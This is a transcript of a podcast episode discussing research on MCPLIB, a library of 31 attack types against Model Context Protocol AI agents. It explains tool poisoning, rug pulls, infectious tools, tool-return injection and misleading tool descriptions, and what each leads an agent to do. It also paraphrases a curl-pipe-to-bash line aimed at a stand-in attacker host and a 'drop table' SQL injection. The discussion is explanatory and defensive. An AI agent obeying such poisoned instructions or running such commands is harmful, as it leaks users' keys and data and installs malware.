Welcome to the Deep Dive, the show where we slice through the information overload to bring you the most critical insights. Today, we're diving headfirst into the exciting and, frankly, a bit unsettling world of AI agents.
Hmm.
You've definitely heard the buzz, right? These agents are rapidly changing how we interact with technology. They're connecting powerful large language models, LLMs, to external tools, making them incredibly versatile.
Oh, absolutely.
It's like the next leap for AI, moving beyond just generating text to actually doing things,
Yeah.
in the real world.
It's a massive leap, yeah. And a key player making this entire seamless connection possible is a standard known as the Model Context Protocol, or MCP.
MCP.
And essentially lets these AI agents talk to everything. I mean, from your local files to vast databases, even the entire internet.
Wow.
On the surface, it sounds amazing, right? Pure innovation, like a truly unified communication backbone for the AI future.
It absolutely does.
Yeah.
It sounds like exactly what we need for AI to reach its full potential. But, okay, where's the catch? Because you know us, there's always a but when something sounds almost too good to be true.
Right. There usually is.
So our mission today is to take a deep dive into the underlying architecture of these agents, specifically MCP, and uncover some significant, often hidden security vulnerabilities.
Yeah, and these aren't just theoretical possibilities.
No, exactly. They could compromise functionality and, critically, your data. We're drawing insights from a really rigorous study by leading researchers, Tsinghua University, Ant Group, Swinburne University, and others. They've actually built an attack library to systematically understand these risks. So let's unpack this.
That's good.
Right. To really understand the threat, we first need to grasp what MCP is and why it's so fundamental to this new AI ecosystem. What's the core concept here?
Okay, so at its core, MCP standardizes how context gets exchanged. Between the AI models and various applications, think of it like the central nervous system for these modern AI agent ecosystems.
Central nervous system. I like
Yeah,
that.
it operates on a client-server model. You've got your AI application as the host, a client sending requests, and then the server.
Okay.
And this server, this is where the magic and, like you said, the risk happens, because it holds the key capabilities, tools for external operations.
Right.
Resources for data access, and prompts to optimize workflows.
That's a powerful shift from just, text generation. So with these tools and resources, are we talking about AI actually doing things in your system, like managing files or accessing data? What does that look like?
Yeah, you hit on something critical there.
Yeah.
We're absolutely talking about AI agents performing real-world tasks.
Okay.
This could be anything, really. Reading local files on your machine, querying massive databases for specific info, or even accessing networks to pull data from the internet. Services you might know, like GitHub and Smithery, they already leverage MCP. That really shows its widespread adoption, its importance.
It's already out there.
Exactly. This unified communication is incredibly beneficial, no doubt. Makes AI agents way more powerful, adaptable. But, and here's the thing, its very concise design, its elegance, you say that's precisely where these significant vulnerabilities start to creep in.
Ah, okay. And that leads us directly into something pretty alarming you mentioned. Tool poisoning attacks, or TPA.
Yeah, TPA.
The security company Invariant Labs first brought these up, right? Back in April 2025. This sounds serious. How do these actually work?
Well, in a TPA, attackers embed hidden malicious instructions. And they put them inside what seem like perfectly okay tool descriptions, or maybe even just in code comments.
Hidden instructions, so you wouldn't see them.
Exactly. You, the user, wouldn't see them. But the AI model sees them, and it perceives them as legitimate instructions. The core mechanism here is something researchers call LLM sycophancy.
Sycophancy, like sucking up.
Sort of, yeah.
Yeah.
Essentially, the AI agent blindly trusts these tool descriptions. It often treats them as if they were direct commands from the user.
Oh, wow.
And that can lead to the agent doing things it shouldn't. Unauthorized operations, like reading sensitive files, maybe modifying system configs, or even leaking private data.
And I guess MCP makes this easier.
Unfortunately, yes. Because tools within the MCP ecosystem are typically pre-authorized, often with broad permissions, these MCP agents offer a significantly wider attack surface. It makes exploitation much simpler for attackers.
That's a huge point. If the tools are already trusted, the attacker just needs to mess with the description of the tool, not the tool itself initially.
Precisely.
It really makes you wonder, if our AI agents are built on this inherent trust, what happens when that trust gets exploited in such subtle, almost invisible ways?
It's a fundamental problem.
It highlights this critical need for a systematic understanding, which brings us to the paper's crucial contribution. The MCP Attack Library, MCPLIB.
Yes, MCPLIB. It's really a game changer. It's the first unified plugin-based attack simulation framework.
So it's practical, not just theory.
Exactly. It doesn't just theorize. It allows for reproducible, real-world evaluations. The researchers systematically classified, get this, 31 distinct attack types.
31. Wow.
Yeah, and they organized them into 4 major categories. This systematic approach was desperately needed because, honestly, existing research was fragmented, inconsistent, and often lacked that practical validation in real-world scenarios.
Okay, so what are those 4 big categories? Give us the overview.
Right, so they fall into 4 main buckets. First, you've got direct tool injection. That's where malicious payloads are put directly in a tool's description.
Okay, straightforward enough.
Second, indirect tool injection. This is sneakier. It exploits external data or system dependencies to spread the malicious effects.
Okay.
Third, malicious user attack. Here, users themselves launch attacks, either against the MCP system or maybe other users.
Right, the user as the vector.
And finally, LLM inherent attack. This basically amplifies existing LM vulnerabilities, like hallucination, because of how tightly MCP integrates with the tools.
Got it. Okay, let's get into the nitty-gritty then. Give us some concrete examples of how these attacks actually play out. These aren't just theoretical, right? They tested these.
Absolutely tested. Let's start with direct tool injection. Take a file-based injection attack.
Okay.
An attacker might subtly modify a tool's description to include commands that, say, alter your mcp.json file, that's a key config file for MCP agents,
Right.
to plant backdoors, or even retrieve your sensitive API keys via HTTP or email.
Yeah.
It's incredibly subtle, but potentially very damaging.
Yeah, definitely.
Then there's the rug pull attack, which Invariant Labs proposed. This one's clever. The attackers distribute a legitimate-looking service. You install it, and then after installation, they remotely modify the tool's description online.
After you've installed it.
Exactly.
It was like,
This injects malicious logic, maybe hijacking API calls, and it's incredibly stealthy because it bypasses static code reviews that usually happen before installation.
so it's like a Trojan horse that changes its stripes after it's already inside your system. Yeah, that's terrifying.
It really is.
And what about when multiple tools are involved in direct injection?
That's where infectious attacks come in. Imagine an agent is asked to generate a new tool, maybe a subtraction tool.
Okay.
But if there's an existing malicious add tool in the shared context, the agent, relying on that context, might mimic its structure.
Oh, I see.
This can lead to the new tool inadvertently inheriting dangerous flaws, like maybe it copies a bit of bad code that lets an attacker run their own commands inside the agent. It's literally like a virus for tools, self-replicating the vulnerability.
That's a genuinely frightening scenario. The agent itself spreads the problem.
Exactly. Its own learning process becomes the vector.
How prevalent do you think this viral spread could become, given how stealthy it is? And what about indirect tool injection? How does that work?
Well, prevalence is hard to say yet, but it's definitely concerned with rapid adoption. For indirect tool injection, think about the malicious project install attack. An attacker embeds malicious commands into an open-source project's readme.md file. Something seemingly innocent, maybe like curl http.attacker.com/malware.hbash.
Oh, yeah. That pipe to bash is always scary.
Right. So when a user, using an MCP agent, follows the installation instructions from that read, that script just executes automatically.
Without the user realizing.
Potentially, yeah. It spreads malware silently through the software supply chain.
Wow. Okay. And malicious user attacks, it sounds like the user themselves is the problem here.
Yes, in this case. A common one is SQL injection and API theft. Attackers can use simple, maybe seemingly harmless tools like a read config tool to actually pull out sensitive API tokens directly from local config files like that MCP.json we mentioned.
Yikes.
Or through database interfaces, they can embed malicious SQL queries into user inputs. You know, the classic drop table users kind of thing.
Right, SQL injection. Still a problem after all these years.
Still a huge problem. And they exploit vulnerabilities to execute destructive operations or steal data. This specific attack type, by the way, had the highest efficacy score in the study.
Really?
The highest. Yep. A perfect 10.00, which really emphasizes its severe practical threat.
Okay, that's a major red flag. And finally, the LLM inherent attacks. How do those manifest through MCP?
Right. So here we see things like the hallucination attack. Attackers create misleading tool descriptions. For example, a fake database tool that falsely claims it provides real-time stock data.
Okay.
The LLM, trusting this description, then generates fabricated responses. It just makes stuff up, thinking it's using a real tool.
So you could ask for a stock price.
Exactly.
Yeah.
And the LLM, thinking it's using a legitimate tool, gives you a completely made-up number, which could lead to, really bad investment decisions based on totally false information.
What's fascinating here and kind of disturbing is how diverse and subtle these attack vectors are. They often prey on that trust, or the inherent behaviors of the AI itself. It's not always about brute force, it's deception, manipulation.
Precisely. The core design, the very things that make it powerful, are leveraged against it.
So beyond these specific attacks, the researchers went deeper, right? To uncover the fundamental flaws in MCP's design that allow these vulnerabilities. They pinpointed 4 critical insights into why these systems are so vulnerable. What's the first big takeaway?
Yeah, the first critical and, frankly, kind of alarming discovery is that MCP agents exhibit varying sensitivity across different attack types.
Varying sensitivity. What does that mean practically?
Well, what it means for you is that some deeply concerning actions, like quietly copying your sensitive data from, say, that MCP.json file and saving it somewhere else, are barely registered by the agent. They require no user confirmation.
No confirmation for copying sensitive data.
None in their tests for certain file operations. This creates a wide-open path for stealthy attacks. Attackers can exfiltrate data or create configuration backups without you ever knowing. But in stark contrast, more obvious actions like actually executing code or deleting files do typically require explicit user approval. So attackers exploit this difference. They hide malicious payloads in seemingly benign file operations.
That's a huge loophole. It's like leaving the back door wide open while putting a huge padlock and alarm on the front door.
That's a good way to put it, yeah.
Okay, what's the second insight?
The second insight is that MCP agents heavily rely on tool descriptions during decision-making. This is that LLM sycophancy we talked about, but amplified.
Right, trusting the text.
Exactly. The agent prioritizes the textual description of a tool over its actual functionality. So a malicious tool can craft a misleading description. For instance, in a malicious tool coverage attack, they might use an identical name to a legitimate tool, but then the description claims the original tool is deprecated, or maybe this new version is much more efficient.
Oh, sneaky.
Very. And in their experiments, this had a 100% success rate for something as common as weather tools. It completely tricked the LLM into using the malicious version every time.
100%. Wow. So the LLM is basically being gaslit into using the wrong tool.
Pretty much, yeah. It's just a confidence trick played on an AI.
Okay. And the third insight. This sounds like it gets even more complex.
It does. And perhaps this is the most insidious vulnerability. It arises from what makes these agents so powerful in the first place.
Yeah.
Their ability to learn and adapt from shared information can turn them into unwitting accomplices. It can cause vulnerabilities to spread, almost like a digital virus, through their own learning process.
How does that happen?
Well, since all the information in MCP tool descriptions, previous interactions, data, it's all stored in a shared context.
Right.
Agents can actually repair flaws in tools or infer sensitive concepts from unrelated tools just based on this shared contextual info, often leading to bad outcomes.
Can you give an example?
Sure. Remember the infectious attack. If an agent needs to create a new subtraction tool, but there's a malicious add tool already in the shared context, the agent might generate the new tool by mimicking the vulnerable structure of that add tool, just because it's in the context. So the new tool inherits the flaw.
So it learns the wrong thing.
Exactly. Or in a multi-tool cooperation attack, maybe a division tool infers the concept of a sensitive side note parameter, just because it saw that parameter used in an unrelated add tool description within the shared context.
And uses it incorrectly.
And uses it to unintentionally extract data during its own execution. The agent essentially repairs flaws or makes connections based on this shared knowledge, often creating new vulnerabilities without realizing it.
So the very feature that makes them adaptable learning from context can be turned against them. That's incredibly sneaky. Okay, and the fourth insight.
The final key insight is that MCP agents struggle to differentiate between external data and executable instructions.
Data versus instructions. That sounds fundamental.
It is. In these MCP systems, tools and data often get represented in very similar formats within the LLM's context window. There isn't a clear separation. So this allows attackers to embed malicious instructions into tool outputs, or maybe to third-party data that the tool retrieves. And the LLM, it just blindly executes them as if they were legitimate commands.
Because it can't tell the difference.
Right. And the research found that MCP tool return attacks, where the attack is hidden in the data returned by a tool, had a significantly higher success rate than other indirect methods.
Why is that?
Primarily because the LLM seems to assume that tool returns are system-verified feedback. It trusts them more. So it lacks strict contextual isolation when parsing that return data. And again, because of LLM sycophancy, even nonsensical data might be blindly executed if it looks vaguely like a command.
So wrapping these insights up, what does this all really mean for us? It sounds like the way these AI systems are designed to learn and trust can be turned against them in surprisingly simple ways, often just by feeding them deceptive information.
That's the core issue, yeah. The trust and the reliance on text description are major weaknesses.
It's truly fascinating how these core design elements become security vulnerabilities. Now, it's one thing to describe these attacks, but you mentioned the researchers went further. They quantified the real-world impact. How did they measure this?
Yeah, they developed a metric they called attack efficacy. It's designed to quantify the potential harm.
Okay.
It combines 4 dimensions: the overall security risk level of the attack success rate they saw in experiments, the persistent impact scope, like does it cause lasting damage, and finally, how difficult it is to actually implement the attack.
Makes sense. A practical measure.
Exactly. They conducted extensive experiments using this metric, and what they found was pretty stark. Attacks like that SQL injection and API stuff we discussed.
Yeah, the one the user initiates.
That one scored the highest. It achieved a perfect 10.00 efficacy score.
10 out of 10. Wow.
Which really emphasizes the severe practical threat these types of vulnerabilities pose in real-world scenarios. It's not theoretical. It's a major measurable risk right now.
Okay. The good news, hopefully, is that understanding these vulnerabilities is always the crucial first step towards building stronger defenses.
Absolutely. You can't defend against what you don't understand.
So what are some of the efforts already underway to try and plug these holes?
Well, there are ongoing defense efforts. Companies like Invariant Labs, who first disclosed TPA, they're developing tools like MCP Scan to detect these attack features and descriptions, and also guardrails to monitor interactions between agents, LLMs, and MCP.
Okay, so detection and monitoring.
Right. And Tencent also has something called AI InfraGuard, which is more of a broader AI infrastructure security framework. But fundamentally, this groundbreaking research we've been discussing, it provides that foundational framework.
To build better defenses.
Exactly. To inform much more robust defense strategies and hopefully guide more secure MCP design choices moving forward.
Yeah.
Maybe allowing us to close these gaps proactively, not just reactively. But it really raises an important question, doesn't it? As AI agents become more and more intertwined with our digital lives, how quickly can we actually close these security gaps before they become widespread threats?
That is the question. Are we building defenses fast enough?
It's a race, for sure.
We've truly unpacked a fascinating and, yeah, let's be honest, a bit unsettling aspect of AI agent security today. What we've learned is that while this model context protocol unlocks incredible functionality for AI, its very design, the reliance on text, the shared context, the blurry lines between data and instructions also introduces these deep-seated vulnerabilities.
Yeah, vulnerabilities that attackers are already exploiting in surprisingly sophisticated ways.
It really underscores that in this rapidly evolving world of AI, vigilance and a systematic, almost adversarial approach to security are just paramount.
Absolutely. That blind trust, the very thing that makes AI agents so powerful and easy to use, can also be their Achilles heel.
So as AI agents continue to evolve and integrate ever deeper into our daily tasks, our work, our lives, will the race to secure them always be playing catch-up? Or can we actually design them for true resilience right from the ground up?
That's the critical question, isn't it? For the future of these intelligent systems, can we build in safety, or are we always going to be patching holes after the fact?
Something for all of us to think about. Thanks for joining us on the Deep Dive.